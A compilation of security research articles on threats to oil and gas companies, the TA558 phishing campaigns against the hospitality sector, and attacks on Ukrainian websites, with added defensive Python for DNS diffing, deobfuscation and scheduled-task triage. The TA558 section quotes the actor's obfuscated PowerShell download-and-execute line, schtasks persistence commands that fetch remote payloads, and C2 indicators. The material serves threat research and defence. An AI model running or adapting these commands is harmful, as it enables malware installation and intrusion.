Oil and Gas Cybersecurity: Industry Overview Part 1

The oil and gas industry is no stranger to major cyberattacks that attempt to disrupt operations and services. Most of the best-understood attacks against the oil industry are initial attempts to break into the corporate networks of oil companies.

Geopolitical tensions can cause major changes not only in physical space, but also in cyberspace. In March 2022, our researchers observed several alleged cyberattacks perpetrated by different groups. It is now more important than ever to identify potential threats that may disrupt oil and gas companies, especially at a time when tensions are high.

Our survey also found that oil and gas companies have experienced disruptions to their supply due to cyberattacks. On average, the disruption lasted six days. The financial damage amounts to approximately $3.3 million. Because the disruptions are long, the oil and gas industry also suffers much larger damage.

It is important to take an in-depth look at cyberattacks that can disrupt oil and gas companies because they affect operations and profit in a major way. By looking closer at the infrastructure of an oil and gas company and identifying threats that can disrupt operations, a company can seal off loopholes and improve its cybersecurity framework.

The Infrastructure of a Typical Oil and Gas Company

An oil and gas company’s product chain usually has three parts: upstream, midstream, and downstream. Processes related to oil exploration and production are called upstream, while midstream refers to the transportation and storage of crude oil through pipelines, trains, ships, or trucks. Lastly, downstream is the production of end products. Cyber risks are present in all three categories, but for midstream and upstream, there are few publicly documented incidents.

Generally, an oil company has production sites where crude oil is extracted from wells, tank farms, where oil is stored temporarily, and a transportation system to bring the crude oil to a refinery. Transportation may include pipelines, trains, and ships. After processing in the refinery, different end products like diesel fuel, gasoline, and jet fuel are transported to tank farms and the products are later shipped to customers.

A gas company also typically has production sites and a transportation system such as railroads, ships, and pipelines. However, it needs compressor stations where the natural gas is compressed before transport. The natural gas is then transported to another plant that separates different hydrocarbon components, like LPG and cooking gas, from the natural gas.

The intricate processes of oil and gas companies mean they require constant monitoring to ensure optimal performance measurement, performance improvement, quality control, and safety.

Monitoring metrics include temperature, pressure, chemical composition, and detection of leaks. Some oil and gas production sites are in very remote locations where the weather can be extreme. For these sites, communication of the monitored metrics over the air, fixed (optic or copper) lines, or satellite is important. The systems of an oil and gas company are typically controlled by software and can be compromised by an attacker.

Threats

There are several threats that oil and gas companies should be aware of. The biggest threats to the industry are those that have a direct negative impact on the production of their end products. In addition, espionage is something that such companies need to defend themselves against, too.

In our in-depth research, the expert team at Trend Micro identified the following threats that can compromise oil and gas companies:

  • Sabotage
    In the context of the oil and gas industry, sabotage can be done by changing the behavior of software, deleting or wiping specific content to disrupt company activity or deleting or wiping as much content as possible on every accessible machine.

    Some examples of these kinds of sabotage operations have been reported broadly, the most famous being the Stuxnet case. Stuxnet was a piece of self-replicating malware that contained a very targeted and specific payload. Most infections of the worm were in Iran and analysis revealed that it was designed to exclusively target the centrifuge in the uranium enrichment facility of the Natanz Nuclear Plant in the country.
  • Insider threat
    In most cases, an insider is a disgruntled employee seeking revenge or wanting to make easy money by selling valuable data to competitors. This person can sabotage operations. They can alter data to create problems, delete or destroy data from corporate servers or shared project folders, steal intellectual property, and leak sensitive documents to third parties.

    Defense against insider threats is very complex since insiders generally have access to a lot of data. An insider also does not need months to know the internal network of the company — the insider probably already knows the inner workings of the organization.
  • Espionage and data theft
    Data theft and espionage can be the starting point of a larger destructive attack. Attackers often need specific information before attempting further action. Obtaining sensitive data like well drilling techniques, data on suspected oil and gas reserves, and special recipes for premium products can also translate to monetary gain for attackers.
  • DNS hijacking
    DNS hijacking is a form of data theft used by advanced attackers. The objective is to gain access to the corporate VPN network or corporate emails of governments and companies. We have seen several oil companies being targeted by advanced attackers who probably have certain geopolitical goals in mind.

    In DNS hijacking, the DNS settings of a domain name are modified by an unauthorized third party. The third party can, for instance, add an entry to the zone file of a domain or alter the resolution of one or more of the existing hostnames. The simplest things the attacker can do are committing vandalism (defacement), leaving a message on the hijacked website, and making the website unavailable. This will usually be noticed quickly and the result may just be reputational damage.
  • Attacks on Webmail and Corporate VPN Servers
    While webmail and file-sharing services have become vital tools for accessing emails and important documents on the go, these services can enlarge the attack surface and increase the possibility of a cyberattack.

    For instance, a webmail hostname might get DNS-hijacked or hacked because of a vulnerability in the webmail software. Webmail and file-sharing and collaboration platforms can be compromised in credential-phishing attacks.

    A well-prepared credential-phishing attack can be quite convincing, as when an actor registers a domain name that resembles the legitimate webmail hostname, or when an actor creates a valid SSL certificate and chooses the targets within an organization carefully. The risk of webmail and third-party file-sharing services can be greatly reduced by requiring two-factor authentication (preferably with a physical key) and corporate VPN access to these services.
  • Data leaks
    Data leaks have always been problematic. But the oil and gas industry is more susceptible to these threats because leaked information can be quite beneficial to a competitor. Data leaks can also cause substantial damage to a company’s reputation.

    During our research, we easily found dozens of sensitive documents related to the oil industry online. One way of finding these documents is by using specially crafted Google queries, called Google Dorks.

    Another way to find such content is to hunt for data on public services like Pastebin, an online service that allows anyone to copy and paste any text-based content and store it there, privately, or publicly. Another source of data is public sandboxes meant for analysis of suspicious files. Users can mistakenly send legitimate documents to these sandboxes for analysis. Once uploaded, these documents can be parsed or downloaded by third parties.
  • External emails
    In general, emails are well-protected inside companies. However, external emails cannot be controlled the same way. Employees regularly send emails to external addresses, hence some sensitive internal content ends up outside the company’s purview. Even worse, sensitive information can be copied to unsecured backup systems or stored locally on personal computers without standard corporate security protocols, which makes it easier for attackers to get hold of the information. Once a computer is compromised, an attacker can get the emails and use them in different ways to harm a company. For example, an actor could leak them on public servers or services like Pastebin.
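A defensive check for the DNS hijacking item in the list above, added here as an example that is not part of the original report: it diffs an observed zone snapshot against an approved baseline and flags added entries and altered resolutions, ranking webmail and VPN hostnames highest because the report names them as the hijackers' objective. The zone contents, the example.com names and the `SENSITIVE_LABELS` list are constructed assumptions.

```python
"""Flag unauthorized DNS changes by diffing a zone snapshot against a baseline."""
from collections import defaultdict

# Assumption: leftmost labels naming the services the report says hijackers
# are after (corporate VPN and e-mail). Adjust to local naming.
SENSITIVE_LABELS = ("webmail", "mail", "vpn")
# Record types whose change redirects traffic or mail for a hostname.
WATCHED_TYPES = {"A", "AAAA", "CNAME", "MX", "NS"}

# Constructed sample data (documentation address ranges, example.com).
BASELINE_ZONE = """
example.com.            3600 IN NS    ns1.example.com.
example.com.            3600 IN MX    10 mail.example.com.
webmail.example.com.    300  IN A     192.0.2.10
vpn.example.com.        300  IN A     192.0.2.20
www.example.com.        300  IN A     192.0.2.30
"""
OBSERVED_ZONE = """
example.com.            3600 IN NS    ns1.example.com.
example.com.            3600 IN MX    10 mail.example.com.
webmail.example.com.    300  IN A     203.0.113.66   ; resolution altered
vpn.example.com.        300  IN A     192.0.2.20
www.example.com.        300  IN A     192.0.2.30
vpn-portal.example.com. 300  IN A     203.0.113.66   ; entry added
intranet.example.com.   300  IN CNAME www.example.com.
"""


def parse_zone(text):
    """Parse 'name ttl IN type value' lines into {(name, type): {values}}."""
    records = defaultdict(set)
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # drop trailing comments
        parts = line.split(None, 4)
        if len(parts) != 5 or parts[2].upper() != "IN":
            continue                              # not in the expected form
        name, _ttl, _cls, rtype, value = parts
        rtype = rtype.upper()
        if rtype in WATCHED_TYPES:
            key = (name.lower().rstrip("."), rtype)
            records[key].add(value.lower().rstrip("."))
    return dict(records)


def is_sensitive(name):
    """True when the leftmost label looks like a mail or VPN service."""
    first_label = name.split(".", 1)[0]
    return any(first_label.startswith(label) for label in SENSITIVE_LABELS)


def diff_zone(baseline, observed):
    """Return one finding per record set that differs from the baseline."""
    findings = []
    for key in sorted(set(baseline) | set(observed)):
        name, rtype = key
        old, new = baseline.get(key, set()), observed.get(key, set())
        if old == new:
            continue
        kind = "added" if not old else "removed" if not new else "changed"
        # NS changes hand the whole zone to another server, so rank them high too.
        severity = "high" if is_sensitive(name) or rtype == "NS" else "medium"
        findings.append({"name": name, "type": rtype, "kind": kind,
                         "severity": severity,
                         "old": sorted(old), "new": sorted(new)})
    return findings


if __name__ == "__main__":
    for f in diff_zone(parse_zone(BASELINE_ZONE), parse_zone(OBSERVED_ZONE)):
        print(f"[{f['severity']}] {f['kind']:8} {f['name']} {f['type']} "
              f"{f['old']} -> {f['new']}")
```

Run it on a schedule against snapshots taken from the authoritative servers and from an outside resolver, since a change at the registrar or DNS provider will not show up in internal configuration management.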

In part two of our series, we look at additional threats that can compromise oil and gas companies, such as ransomware, malware, DNS tunneling, and zero-day exploits.

To learn more about digital threats that the oil and gas industry faces, download our comprehensive research here.

Source :
https://www.trendmicro.com/en_us/research/22/h/oil-gas-cybersecurity-part-1.html

Reservations Requested: TA558 Targets Hospitality and Travel 

Key Findings:

  • TA558 is a likely financially motivated small crime threat actor targeting hospitality, hotel, and travel organizations.
  • Since 2018, this group has used consistent tactics, techniques, and procedures to attempt to install a variety of malware including Loda RAT, Vjw0rm, and Revenge RAT.
  • TA558’s targeting focus is mainly on Portuguese and Spanish speakers, typically located in the Latin America region, with additional targeting observed in Western Europe and North America.
  • TA558 increased operational tempo in 2022 to a higher average than previously observed. 
  • Like other threat actors in 2022, TA558 pivoted away from using macro-enabled documents in campaigns and adopted new tactics, techniques, and procedures. 

Overview

Since 2018, Proofpoint has tracked a financially-motivated cybercrime actor, TA558, targeting hospitality, travel, and related industries located in Latin America and sometimes North America, and western Europe. The actor sends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed lures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments or URLs aiming to distribute one of at least 15 different malware payloads, typically remote access trojans (RATs), that can enable reconnaissance, data theft, and distribution of follow-on payloads.

Proofpoint tracked this actor based on a variety of email artifacts, delivery and installation techniques, command and control (C2) infrastructure, payload domains, and other infrastructure.

In 2022, Proofpoint observed an increase in activity compared to previous years. Additionally, TA558 shifted tactics and began using URLs and container files to distribute malware, likely in response to Microsoft announcing it would begin blocking VBA macros downloaded from the internet by default. 

TA558 has some overlap with activity reported by Palo Alto Networks in 2018, Cisco Talos in 2020 and 2021, Uptycs in 2020, and HP in 2022. This report is the first comprehensive, public report on TA558, detailing activity conducted over four years that is still ongoing. The information used in the creation of this report is based on email campaigns, which are manually contextualized, and analyst enriched descriptions of automatically condemned threats.

Campaign Details and Activity Timeline

2018

Proofpoint first observed TA558 in April 2018. These early campaigns typically used malicious Word attachments that exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) or remote template URLs to download and install malware. Two of the most common malware payloads included Loda and Revenge RAT. Campaigns were conducted exclusively in Spanish and Portuguese and targeted the hospitality and related industries, with “reserva” (Portuguese word for “reservation”) themes. Example campaign:

Subject: Corrigir data da reserva para o dia 03

Attachment: Booking – Dados da Reserva.docx

Attachment “Author”: C.D.T Original

SHA256: 796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910

Figure 1: Example TA558 email from 2018

The documents leveraged remote template URLs to download an additional RTF document, which then downloaded and installed Revenge RAT. Interestingly, the term “CDT” is in the document metadata and in the URL. This term, which may refer to a travel organization, appears throughout TA558 campaigns from 2018 to present.

RTF payload URL example:

hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc

 

2019

In 2019, this actor continued to leverage emails with Word documents that exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) to download and install malware. TA558 also began using macro-laden PowerPoint attachments and template injection with Office documents. This group expanded their malware arsenal to include Loda, vjw0rm, Revenge RAT, and others. In 2019, the group began occasionally expanding targeting outside of the hospitality and tourism verticals to include business services and manufacturing. Example campaign:

Subject: RESERVA

Attachment: RESERVA.docx

Attachment “Author”: msword

Attachment “Last Saved By”: Richard

SHA256: 7dc70d023b2ee5a941edd925999bb6864343b11758c7dc18309416f2947ddb6e

Figure 2: Example TA558 email from 2019

Figure 3: Example TA558 Microsoft Word attachment from 2019

The documents leveraged a remote template relationship URL to download an additional RTF document. The RTF document (Author: obidah qudah, Operator: Richard) exploited the CVE-2017-11882 vulnerability to retrieve and execute an MSI file. Upon execution, the MSI file extracted and ran Loda malware.

In December 2019, Proofpoint analysts observed TA558 begin to send English-language lures relating to room bookings in addition to Portuguese and Spanish.

2020

In 2020, TA558 stopped using Equation Editor exploits and began distributing malicious Office documents with macros, typically VBA macros, to download and install malware. This group continued to use a variety of malware payloads including the addition of njRAT and Ozone RAT.  

Hotel, hospitality, and travel organization targeting continued. Although the actor slightly increased its English-language operational tempo throughout 2020, most of the lures featured Portuguese and Spanish reservation requests. An example of a common attack chain in 2020:

From: Oab Brasil <fernando1540@bol[.]com[.]br>

Subject: Orçamento Conferencistas – 515449939

Attachment: reserva.ppa

SHA256: c2b817b02e56624c8ed7944e76a3896556dc2b7482f747f4be88f95e232f9207

Figure 4: Example TA558 email from 2020

The message contained a PowerPoint attachment that used template injection techniques and VBA macros which, if enabled, executed a PowerShell script to download a VBS payload from an actor-controlled domain. The VBS script in turn downloaded and executed Revenge RAT.

Figure 5: 2020 attack path example

TA558 was more active in 2020 than previous years and 2021, with 74 campaigns identified. 2018, 2019, and 2021 had 9, 70, and 18 total campaigns, respectively. So far in 2022, Proofpoint analysts have observed 51 TA558 campaigns. 

Figure 6: Total number of TA558 campaigns over time

2021

In 2021, this actor continued to leverage emails with Office documents containing macros or Office exploits (e.g. CVE-2017-8570) to download and install malware. Its most consistently used malware payloads included vjw0rm, njRAT, Revenge RAT, Loda, and AsyncRAT. 

Additionally, this group started to include more elaborate attack chains in 2021, for example by introducing more helper scripts and delivery mechanisms such as embedded Office documents within MSG files.

In this example 2021 campaign, emails purported to be, e.g.:

From: Financeiro UNIMED <financeiro@unimed-corporated[.]com>

Subject: Reserva

Replyto: cdt[name]cdt@gmail[.]com

Attachment: OficioCircularencaminhadoaoSetorFinanceiroUNIMED.docx

SHA256: 2f0f99cbac828092c0ec23e12ecb44cbf53f5a671a80842a2447e6114e4f6979

Emails masqueraded as Unimed, a Brazilian medical work cooperative and health insurance operator. These messages contained Microsoft Word attachments with macros which, if enabled, invoked a series of scripts to ultimately download and execute AsyncRAT. 

Figure 7: Example TA558 email from 2021

Of note is the repeat use of the string “CDT” contained in the replyto email address and C2 domain names.

AsyncRAT C2 domains:

warzonecdt[.]duckdns[.]org

cdt2021.zapto[.]org

Example PowerShell execution to download and execute AsyncRAT:

$NOTHING = '(Ne<^^>t.We'.Replace('<^^>','w-Object Ne');$alosh='bC||||||!@!@nlo'.Replace('||||||!@!@','lient).Dow'); $Dont='adString(''hxxps[:]//brasilnativopousada[.]com[.]br/Final.txt'')';$YOUTUBE=IEX ($NOTHING,$alosh,$Dont -Join '')|IEX
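The one-liner above hides its download call by splitting it across variables and `.Replace()` calls, so keyword matching on the raw text misses it. The following analyst-side resolver is an added example, not Proofpoint's tooling: it statically evaluates the literal assignments and the `-Join` without running any PowerShell. The sample is the command from this page with typographic quotes written as ASCII (the `”` is read as two single quotes, an assumption), and the function names are hypothetical.

```python
"""Statically resolve .Replace()/-Join string obfuscation in a PowerShell one-liner."""
import re

# Command line quoted in the report, URL left defanged as published.
SAMPLE = (
    "$NOTHING = '(Ne<^^>t.We'.Replace('<^^>','w-Object Ne');"
    "$alosh='bC||||||!@!@nlo'.Replace('||||||!@!@','lient).Dow'); "
    "$Dont='adString(''hxxps[:]//brasilnativopousada[.]com[.]br/Final.txt'')';"
    "$YOUTUBE=IEX ($NOTHING,$alosh,$Dont -Join '')|IEX"
)

LIT = r"'((?:[^']|'')*)'"        # single-quoted literal; '' is an escaped quote
LIT_NC = r"'(?:[^']|'')*'"       # same, without a capture group
CALL = r"\s*\.Replace\(\s*" + LIT_NC + r"\s*,\s*" + LIT_NC + r"\s*\)"
ASSIGN = re.compile(r"\$(\w+)\s*=\s*" + LIT + "((?:" + CALL + ")*)", re.I)
REPLACE_CALL = re.compile(r"\.Replace\(\s*" + LIT + r"\s*,\s*" + LIT + r"\s*\)", re.I)
JOIN = re.compile(r"\(\s*((?:\$\w+\s*,\s*)*\$\w+)\s*-join\s*'([^']*)'\s*\)", re.I)
DEFANGED_URL = re.compile(r"hxxps?\[?:\]?//[^\s')]+", re.I)
# Keywords a raw-text scanner would look for.
KEYWORDS = ("net.webclient", "downloadstring")


def unquote(literal):
    """Undo PowerShell's '' escaping inside a single-quoted string."""
    return literal.replace("''", "'")


def resolve_variables(script):
    """Evaluate $var = 'literal'.Replace('a','b')... assignments."""
    env = {}
    for match in ASSIGN.finditer(script):
        name, value, chain = match.group(1), unquote(match.group(2)), match.group(3)
        # .NET String.Replace is ordinal and replaces every occurrence,
        # which is what Python's str.replace does as well.
        for old, new in REPLACE_CALL.findall(chain):
            value = value.replace(unquote(old), unquote(new))
        env[name.lower()] = value     # PowerShell variable names ignore case
    return env


def resolve_joins(script, env):
    """Rebuild every ($a,$b,... -Join 'sep') whose operands are all known."""
    commands = []
    for match in JOIN.finditer(script):
        names = [n.lower() for n in re.findall(r"\$(\w+)", match.group(1))]
        if all(n in env for n in names):
            commands.append(match.group(2).join(env[n] for n in names))
    return commands


def analyze(script):
    commands = resolve_joins(script, resolve_variables(script))
    urls = [u for c in commands for u in DEFANGED_URL.findall(c)]
    # Keywords visible only after resolution: what the obfuscation was hiding.
    hidden = sorted(k for k in KEYWORDS
                    if k not in script.lower()
                    and any(k in c.lower() for c in commands))
    return {"commands": commands, "urls": urls, "hidden_keywords": hidden}


if __name__ == "__main__":
    result = analyze(SAMPLE)
    for command in result["commands"]:
        print("resolved:", command)
    print("urls:", result["urls"])
    print("hidden from raw-text matching:", result["hidden_keywords"])
```

The resolver only handles literal strings, `.Replace()` chains and `-Join`; anything computed at run time still needs script block logging or sandbox output.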

Persistence was achieved through a scheduled task masquerading as a Spotify service.

schtasks /create /sc MINUTE /mo 1 0 /tn "Spotfy" /tr "\"%windir%\system32\mshta.exe\"hxxps[:]//www[.]unimed-corporated[.]com/microsoft.txt" /F

This was the actor’s least active year. Proofpoint observed just 18 campaigns conducted by TA558 in 2021.

2022

In 2022, campaign tempo increased significantly. Campaigns delivered a mixture of malware such as Loda, Revenge RAT, and AsyncRAT. This actor used a variety of delivery mechanisms including URLs, RAR attachments, ISO attachments, and Office documents.

TA558 followed the trend of many threat actors in 2022 and began using container files such as RAR and ISO attachments instead of macro-enabled Office documents. This is likely due to Microsoft’s announcements in late 2021 and early 2022 about disabling macros by default in Office products, which caused a shift across the threat landscape of actors adopting new filetypes to deliver payloads.

Additionally, TA558 began using URLs more frequently in 2022. TA558 conducted 27 campaigns with URLs in 2022, compared to just five campaigns total from 2018 through 2021. Typically, URLs led to container files such as ISOs or zip files containing executables.

Figure 8: Campaigns using specific threat types over time

For example, this 2022 Spanish language campaign featured URLs leading to container files. Messages purported to be, e.g.:

From: Mauricio Fortunato <contato@155hotel[.]com[.]br>

Subject: Enc: Reserva Familiar

The URL purported to be a legitimate 155 Hotel reservation link that led to an ISO file and an embedded batch file. The execution of the BAT file led to a PowerShell helper script that downloaded a follow-on payload, AsyncRAT.

Similar to earlier campaigns, persistence was achieved via a scheduled task:

schtasks /create /sc MINUTE /mo 1 /tn Turismo /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""\""hxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpg""\"" -useB|iex;"

Figure 9: 2022 campaign example chain.
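Both the 2021 and the 2022 persistence commands share one shape: a task that fires every minute or so and whose action fetches and runs remote content. The triage below runs over process-creation command lines and is an added example, not Proofpoint's detection logic: the first two log lines are the commands quoted in this report (defanged as published) and the third is a constructed benign task. The reason names, the 15-minute threshold, the 0.85 similarity cut-off and `KNOWN_NAMES` are assumptions.

```python
"""Triage schtasks /create command lines for download-and-run persistence."""
import re
from difflib import SequenceMatcher

# Simplified switch splitter: enough for the command lines below, not a full
# schtasks parser (an action containing " /f" style arguments would confuse it).
SWITCH_RE = re.compile(r"\s+/(sc|mo|tn|tr|st|ru|rl|f)\b", re.I)
URL_RE = re.compile(r"(?:https?|hxxps?)\[?:\]?//", re.I)
FETCH_RE = re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring)\b", re.I)
EXEC_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
EVASIVE_RE = re.compile(
    r"-w(?:indowstyle)?\s+h(?:idden)?\b|-executionpolicy\s+bypass", re.I)
# Assumption: names of legitimate software a task might try to pass for.
KNOWN_NAMES = ("spotify", "onedrive", "googleupdate")

LOG_LINES = [
    # 2021 command quoted in the report
    r'schtasks /create /sc MINUTE /mo 1 0 /tn "Spotfy" /tr "\"%windir%\system32\mshta.exe\"hxxps[:]//www[.]unimed-corporated[.]com/microsoft.txt" /F',
    # 2022 command quoted in the report
    r'schtasks /create /sc MINUTE /mo 1 /tn Turismo /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr ""\""hxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpg""\"" -useB|iex;"',
    # constructed benign task
    r'schtasks /create /sc DAILY /st 02:00 /tn "NightlyBackup" /tr "C:\Tools\backup.exe --full" /F',
]


def parse_schtasks(cmdline):
    """Return {switch: value} for a 'schtasks /create' line, else None."""
    parts = SWITCH_RE.split(cmdline)
    if not re.search(r"schtasks(?:\.exe)?\b.*?/create\b", parts[0], re.I):
        return None
    return {key.lower(): value.strip().strip('"')
            for key, value in zip(parts[1::2], parts[2::2])}


def triage(cmdline):
    fields = parse_schtasks(cmdline)
    if fields is None:
        return None
    action, name = fields.get("tr", ""), fields.get("tn", "")
    reasons = []
    if re.search(r"\bmshta(?:\.exe)?\b", action, re.I) and URL_RE.search(action):
        reasons.append("mshta_remote_url")
    if ("powershell" in action.lower() and FETCH_RE.search(action)
            and EXEC_RE.search(action)):
        reasons.append("powershell_fetch_and_execute")
    if EVASIVE_RE.search(action):
        reasons.append("hidden_or_policy_bypass")
    interval = re.match(r"\d+", fields.get("mo", ""))
    if (fields.get("sc", "").upper() == "MINUTE" and interval
            and int(interval.group()) <= 15):
        reasons.append("runs_every_few_minutes")
    for known in KNOWN_NAMES:
        # Near-miss spelling of a well-known name, e.g. "Spotfy".
        ratio = SequenceMatcher(None, name.lower(), known).ratio()
        if name.lower() != known and ratio >= 0.85:
            reasons.append("name_resembles_" + known)
    # Alert only on remote fetch-and-run; the other reasons add context.
    alert = bool({"mshta_remote_url", "powershell_fetch_and_execute"} & set(reasons))
    return {"task": name, "reasons": reasons, "alert": alert}


if __name__ == "__main__":
    for line in LOG_LINES:
        print(triage(line))
```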

In April 2022 Proofpoint researchers spotted a divergence from the typical email lure. One of the campaigns included a QuickBooks invoice email lure. Additionally, this campaign included the distribution of RevengeRAT which had not been observed in use by TA558 since December 2020. Messages purported to be:

From: Intuit QuickBooks Team <quickbooks@unimed-corporated.com>

Subject: QuickBooks Invoice 1000172347

Attachment: 1000172347.xlsm

SHA256: b57a9f7321216c3410ebcc9d4b09e73a652dee9e750f96b2f6d7d1e39e2923d6

The emails contained Excel attachments with macros that downloaded helper scripts via PowerShell and MSHTA. The execution of helper scripts ultimately led to the installation of RevengeRAT. Proofpoint has not seen this theme since April, and it is unclear why TA558 temporarily pivoted away from reservations themes. 

Malware Use

Since 2018, TA558 has used at least 15 different malware families, sometimes with overlapping command and control (C2) domains. The most frequently observed payloads include Loda, Vjw0rm, AsyncRAT, and Revenge RAT.  

Figure 10: Number of TA558 campaigns by malware type over time

Typically, TA558 uses attacker owned and operated infrastructure. However, Proofpoint has observed TA558 leverage compromised hotel websites to host malware payloads, thus adding legitimacy to its malware delivery and C2 traffic.  

Language Use

Since Proofpoint began tracking TA558 through 2022, over 90% of campaigns were conducted in Portuguese or Spanish, with four percent featuring multiple language lure samples in English, Spanish, or Portuguese.

Figure 11: Campaign totals by language since 2018

Interestingly, the threat actor often switches languages in the same week. Proofpoint researchers have observed this actor send, for example, a campaign in English and the following day another campaign in Portuguese. Individual targeting typically differs based on campaign language.

Notable Campaign Artifacts

In addition to the consistent lure themes, targeting, message content, and malware payloads, Proofpoint researchers observed TA558 using multiple notable patterns in campaign data including the use of certain strings, naming conventions and keywords, domains, etc. For example, the actor appears to repeat the term CDT in email and malware attributes. This may relate to the CDT Travel organization and related travel reservation lure themes. Proofpoint researchers observed TA558 use the CDT term in dozens of campaigns since 2018, in C2 domains, replyto email addresses, payload URLs, scheduled task name, and Microsoft Office document metadata (i.e., Author, Last Saved By), and Microsoft Office macro language.

Throughout many of the 2019 and 2020 campaigns the threat actor used various URLs from the domain sslblindado[.]com to download either helper scripts or malware payloads. Some examples include:

  • microsofft[.]sslblindado[.]com
  • passagensv[.]sslblindado[.]com
  • system11[.]sslblindado[.]com

Like other threat actors, this group sometimes mimics technology service names to appear legitimate, for example by using such terms in payload URLs or C2 domain names. Some examples include:

  • microsofft[.]sslblindado[.]com
  • firefoxsystem[.]sytes[.]net
  • googledrives[.]ddns[.]net

Another interesting pattern observed was the use of common strings like “success” and “pitbull”. In several campaigns Proofpoint researchers spotted these strings in C2 domains. Some examples include:

  • successfully[.]hopto[.]org
  • success20[.]hopto[.]org
  • 4success[.]zapto[.]org

From 2019 through 2020, TA558 conducted 10 campaigns that used the keyword “Maringa” or “Maaringa” in payload URLs or email senders. Maringa is a city in Brazil. Examples include:

  • maringareservas[.]com[.]br/seila[.]rtf
  • maringa[.]turismo@system11[.]com[.]br

Possible Objectives

Proofpoint has not observed post-compromise activity from TA558. Based on the observed payloads, victimology, and campaign and message volume, Proofpoint assesses with medium to high confidence that this is a financially motivated cybercriminal actor.

The malware used by TA558 can steal data including hotel customer user and credit card data, allow lateral movement, and deliver follow-on payloads.

Open-source reporting provides insight into one possible threat actor objective. In July, CNN Portugal reported a Portuguese hotel’s website was compromised, and the actor was able to modify the website and direct customers to a fake reservation page. The actor stole funds from potential customers by posing as the compromised hotel. Although Proofpoint does not associate the identified activity with TA558, it provides an example of possible follow-on activity and the impacts to both target organizations and their customers if an actor is able to compromise hotel or transportation entities.

Conclusion

TA558 is an active threat actor targeting hospitality, travel, and related industries since 2018. Activity conducted by this actor could lead to data theft of both corporate and customer data, as well as potential financial losses.

Organizations, especially those operating in targeted sectors in Latin America, North America, and Western Europe should be aware of this actor’s tactics, techniques, and procedures.

Indicators of Compromise (IOCs)  

The following IOCs represent a sample of indicators observed by Proofpoint researchers associated with TA558.  

C2 Domains

Indicator | Description | Date Observed
quedabesouro[.]ddns[.]net | RevengeRAT C2 Domain | 2018
queda212[.]duckdns[.]org | njRAT/RevengeRAT C2 Domain | 2018
3030pp[.]hopto[.]org | vjw0rm C2 Domain | 2018 and 2019
vemvemserver[.]duckdns[.]org | Houdini/Loda C2 Domain | 2019
4success[.]zapto[.]org | Loda C2 Domain | 2019
success20[.]hopto[.]org | Loda C2 Domain | 2020
msin[.]hopto[.]org | Loda C2 Domain | 2021 and 2022
cdtpitbull[.]hopto[.]org | AsyncRAT C2 Domain | 2021 and 2022
111234cdt[.]ddns[.]net | njRAT/AsyncRAT C2 Domain | 2021 and 2022
cdt2021[.]zapto[.]org | AsyncRAT C2 Domain | 2021 and 2022
38[.]132[.]101[.]45 | RevengeRAT C2 IP | 2022

Payload URLs

Indicator | Description | Date Observed
hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc | RTF payload URL | 2018
hxxp[://]hypemediardf[.]com[.]pl/css/css[.]doc | Loda Payload URL | 2019
hxxps[:]//brasilnativopousada[.]com[.]br/Final[.]txt | AsyncRAT Payload URL | 2021
hxxps[:]//www[.]unimed-corporated[.]com/microsoft[.]txt | AsyncRAT Scheduled Task URL | 2021
hxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpg | AsyncRAT Scheduled Task URL | 2022

ET Signatures

ETPRO MALWARE Loda Logger CnC Activity

ETPRO TROJAN MSIL/Revenge-RAT Keep-Alive Activity (Outbound)

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M2

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M4

ETPRO TROJAN njRAT/Bladabindi Variant CnC Activity (inf)

ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)

ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (inf)

ET TROJAN Bladabindi/njRAT CnC Command (ll)

Source :
https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

Analyzing Attack Data and Trends Targeting Ukrainian Domains

As we continue to monitor the cyber situation in Ukraine, the data we are seeing shows some interesting trends. Not only has the volume of attacks continued rising throughout the conflict in Ukraine, the types of attacks have been varied. A common tactic of cyber criminals is to run automated exploit attempts, hitting as many possible targets as they can to see what gets a result. The data we have analyzed shows that this tactic is being used against Ukrainian websites. This is in contrast to a targeted approach where threat actors go after specific individuals or organizations, using gathered intelligence to make at least an educated guess at the type of vulnerabilities that may be exploitable.

Data Shows a Variety of Attack Types

In the past 30 days, we have seen 16 attack types that triggered more than 85 different firewall rules across protected websites with .ua top-level domains. These rules blocked more than 9.8 million attack attempts on these websites, with the top five attack types accounting for more than 9.7 million of those attempts.

Top blocked rules against .ua domains

In order to demonstrate the top five attack types, we are going to follow a single threat actor who has been observed attempting each of these attack types throughout the last 30 days. Combining the originating IP addresses associated with the attack attempts with the user-agent that was used and other commonalities, we can say with a high degree of certainty that the demonstrated attack attempts were the work of the same threat actor.

Known Malicious IP Addresses

The largest category of blocked attack attempts was due to the use of a known malicious IP address. These IP addresses are maintained by the Wordfence blocklist, with new addresses added when they become maliciously engaged, and removed when they are no longer being used maliciously. When we see activity from an IP address on the blocklist, it is immediately blocked; however, we do track the request that was received from the attacking server.

Top IPs blocked from attacking .ua domains

The top IP addresses we have blocked using known malicious IP addresses were often seen attempting to upload spam content to websites; however, it was also common to see file upload and information disclosure attempts. Here we see a simple POST request that uses URL encoding along with base64 encoding to obfuscate a command to be run.

Blocked IP request example 1

The decoded payload will simply display XO_Sp3ctra to alert the malicious actor that the affected system will allow commands to be run by them.

Output from blocked IP example 1
